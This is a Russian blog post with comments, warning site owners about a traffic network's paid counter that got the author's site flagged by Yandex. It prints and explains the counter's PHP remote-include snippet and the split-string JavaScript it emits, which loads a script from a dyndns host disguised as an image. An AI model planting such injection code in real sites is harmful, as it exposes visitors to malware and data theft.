Всем привет! Возможно, если вы заходили на atamovich.ru в течении последних двух дней, то ваш браузер предупреждал о том, что сайт угрожает компьютеру и т.д. и т.п. В этой статья я поделюсь своим опытом борьбы с вирусами, если такие завелись у вас на сайте. Правда, «вирус» это не то, что надо было бы употреблять, но для простоты изложения и понимания буду писать именно так.
Зайдя на блог Михаила Шакина, наткнулся на интересный баннер системы traffbiz.ru. Подумал, мол, Михайл человек проверенный и авторитетный в многих кругах, не стану тратить время на проверку системы, зарегистрируюсь ка сразу и установлю все, что надо к себе на сайт.
Зарегистрировался, изучил систему, установил счетчик. Все вроде бы просто, да не все 😉
Схема такая: устанавливаешь счетчик — получаешь деньги за RU уникальных посетителей. Заманчиво, не правда ли?
На первый взгляд неопытного пользователя код системы выглядит довольно безобидно, всего каких то пару строчек обрамленные php. Разве смогут что-то плохое сделать пару строчек кода? Вирусы же большие и длинные!
Код выглядил вот так:
Вот нельзя доверять людям, нельзя. При установке я даже не посмотрел, что значит этот код.
Давайте разберем.
$urlp = «http://all-x.ru/?i=30459&c=5»;
Создаем переменную и присваиваем ей адрес
$code = @file_get_contents($urlp);
Создаем вторую переменную, в которую загружаем все то, что нашли по тому адресу
echo $code;
Выводим вторую переменную с загруженным кодом.
А теперь давайте подумаем. Получается с помощью этого коротенького кода злоумышленник может выводить на сайте все что угодно, собирать информацию о посетителях, собирать пароли, заражать и так далее… Тут только фантазией ограничивается 😉
Смотрим, как этот код отображается на самом деле в исходном коде сайта:
Как можете видеть, код «немножко» другой, нежели который мы видели. Оно и понятно, первый же был php-код, а второй уже JS.
Давайте теперь разберем его.
<!—Money counter—>
<script type=»text/javascript»> — тут понятно, обозначаем, что дальше будет идти JavaScript
<!— document.write(‘<sc’ + ‘ript language=»JavaScript» rel=»nofollow» ‘ + ‘src=»http://112zcfhqlb.dyndns.org/30940/counter5.jpg» title=»Money counter» border=»0″ width=»15″ height=»15″></sc’ + ‘ript>’); //—> — выводим текст посредством склеивания отрывков.
</script><!—/Money counter—> — закрывающие теги
document.write() выведет вам все, что вы укажите в скобках. Если текст заключен вот в такие кавычки ‘text’, то выводится строка. + означает склеивание строк.
Итак, что же делает этот скрипт? Он выводит такую строчку: <script language=»JavaScript» rel=»nofollow» src=»http://112zcfhqlb.dyndns.org/30940/counter5.jpg» title=»Money counter» border=»0″ width=»15″ height=»15″></script>
Думаете выводит картинку? А нет! Точнее, да! Но, видимо, не только ее…
Параметр scr в теге <script> указывает, из какого файла загружать программу.
В любом случае, Яндекс считает данный скрипт опасным и «закрывает» сайты, найдя его у вас на странице.
Вам может придти вот такое сообщение:
При дальнейшем общении с Тех.Поддержкой можно узнать, как выглядит вредоносный код.
После устранения, можно наблюдать вот такую картинку в панели Я.Вебмастера:
Я не имею ничего против Михаила или ТраффБиз.ру, со всеми бывает)))
Надеюсь, вы хоть что-то поняли из этого полуночного бреда. Всем спокойной ночи!
Кстати, в скором времени напишу интересный аналитический отчет, так что советую подписаться на RSS 😉
UPD: у Яндекса есть интересная статья по этому поводу, в которой как раз все объясняется!
Ваш Atamovich
Кстати, вы ходите в обычные парикмахерские или в салоны красоты? Если вам нужны салоны красоты в Москве, то прошу последовать по ссылке! Там отличный каталог салонов, с описанием и рейтингом. Не поленитесь, полистайте каталог! Можно ещё и записаться в режиме онлайн!
исходя из кода, этот скрипт действительно опасен лишь ПОТЕНЦИАЛЬНО, это всё равно что когда Каспер ругается при нахождении различных кряков и генераторов ключей
Вот так да. Но я партнёрки пока не использую. Предпочитаю работать лишь с ссылками.
Тем не менее, из-за этого трафик с Яндекса упал почти до нуля…
Сейчас трафик восстановится, напишу статейку *надеюсь* интересную =)
Главное, проверяй все, что ставишь на сайт 😉
Я бы точно не смогла разобраться с кодами.
Вот хотели заработать могли остаться без сайта
Вот поэтому и решил написать «предупредительный» пост читателям сайта 😉
Во жесть 8-0
У меня один бложик как то взломали так неделю ковырялся чистил. А тут вроде все чинно-благородно… Настрелять бы по соплям ентим хацкерам фИговым…
Так самое обидное, что своими руками код вставлял…
я тоже попался — на 2 недели яндекс сайт artmix.biz забанил из-за их счетчика за котоорый плотят!
Yandex через два дня начал ругаться, а Google пока молчит. Посещаемость упала в 2 раза c 800-та человек до 400-та :-((
На страницах сайта it-master.biz обнаружен код, который может быть опасен для посетителей. Выполнение этого кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, порче или краже данных.
В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.
Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.
тоже попался WHak.ru
стоял код от TRAFBIZ на 5 сайтах около 3 мес. и деньги приносил, а сегодня яндекс сразу все эти сайты прикрыл, пришлось снимать код.
Да, я тоже все убрал… Но партнерку оставил:)))
У меня по этому поводу произошла интересная ситуация.Две недели назад яндекс сообщил о наличии вредоносного кода на сайте.Проверяла онлайн-антивирусниками — ничего не нашли,после повторной проверки — яндекс подтвердил,что все чисто.Да,за это время естественно посещаемость и так не большая упала в 3 раза.В итоге,все наладилось и только вздохнула с облегчением,как новый поворот.Вновь сообщение о вредоносном коде.Оказывается все дело в счетчике от трафбиза.И теперь возникает вопрос — достаточно ли простого удаления этого кода со страницы,где он был установлен или надо теперь все проверять на наличие,коль он такой хитрый?Посоветуйте,пожалуйста.
В теории, он мог оставить что-то на сайте. Но я думаю, что достаточно просто удалить скрипт, а потом проверить весь сайт на вирусы через онлайн сервисы или техподдержку хостинга.
Здравствуйте. Примерно такой же код ставится и от beetraf .ru
Я тоже поймал троян, потом долго чистился.
Если интересно, можете прочитать о заражении и лечении в статье:
http:// aviatalker. ru/beetraf-ru-troyan-virus/
Нет больше доверия к iframe…
Не в первый раз убеждаюсь, что не все сети порядочные. Под видом нормального подсовывают обывателям и неопытным-шлак. Вот и работай с ними. Моментально пароли поснимают. негодяи.
Убрал код сразу с пяти сайтов, прошло уже 12 дней как подал на перепроверку, а перепроверки все нет и все сайты до сих пор помечены яндексом! Как часто яндекс-тормоз проверяет сайты?
У меня в течении 3х дней проверил. Напишите Платону в Яндекс:-)
Писал два раза. Присылают шаблонный ответ:
Если Вы считаете, что сейчас сайты уже не являются опасным для пользователей, пожалуйста, дождитесь, пока антивирус перепроверит их. Для ускорения процесса можно послать сайт на перепроверку вручную через сервис Яндекс.Вебмастер.
Хм… может код что-то успел натворить?
проверьте через он-лайн антивирусы сайт, вдруг там какая-то другая зараза засела.
Можно попробовать написать техподдержке хостера, может они чего найдут…
В панели вебмастера яндекса указано число последней проверки сайтов на вирусы. Это число как было 28 февраля, так до сих пор и остается. Просто нет перепроверок уже так долго.
Значит косяк яндекса…
Помню у них была проблема с чтением карты сайта, и мой сайт отвратительно индексировался. Тоже писали отписками. через 2 месяца исправили втихую:) Теперь норм.
Так что, думаю, остается только ждать…
Похоже,что Яндекс уработался. У меня тоже до сих пор не перепроверено с 28 февраля,не смотря на то,что уже несколько раз писала письма,полный игнор с его стороны.
желательно сделать откат на дату предшествующую установке счетчика. Вам поможет служба хостинга.
Я тоже попадалась на это на http://photoyrok.ru/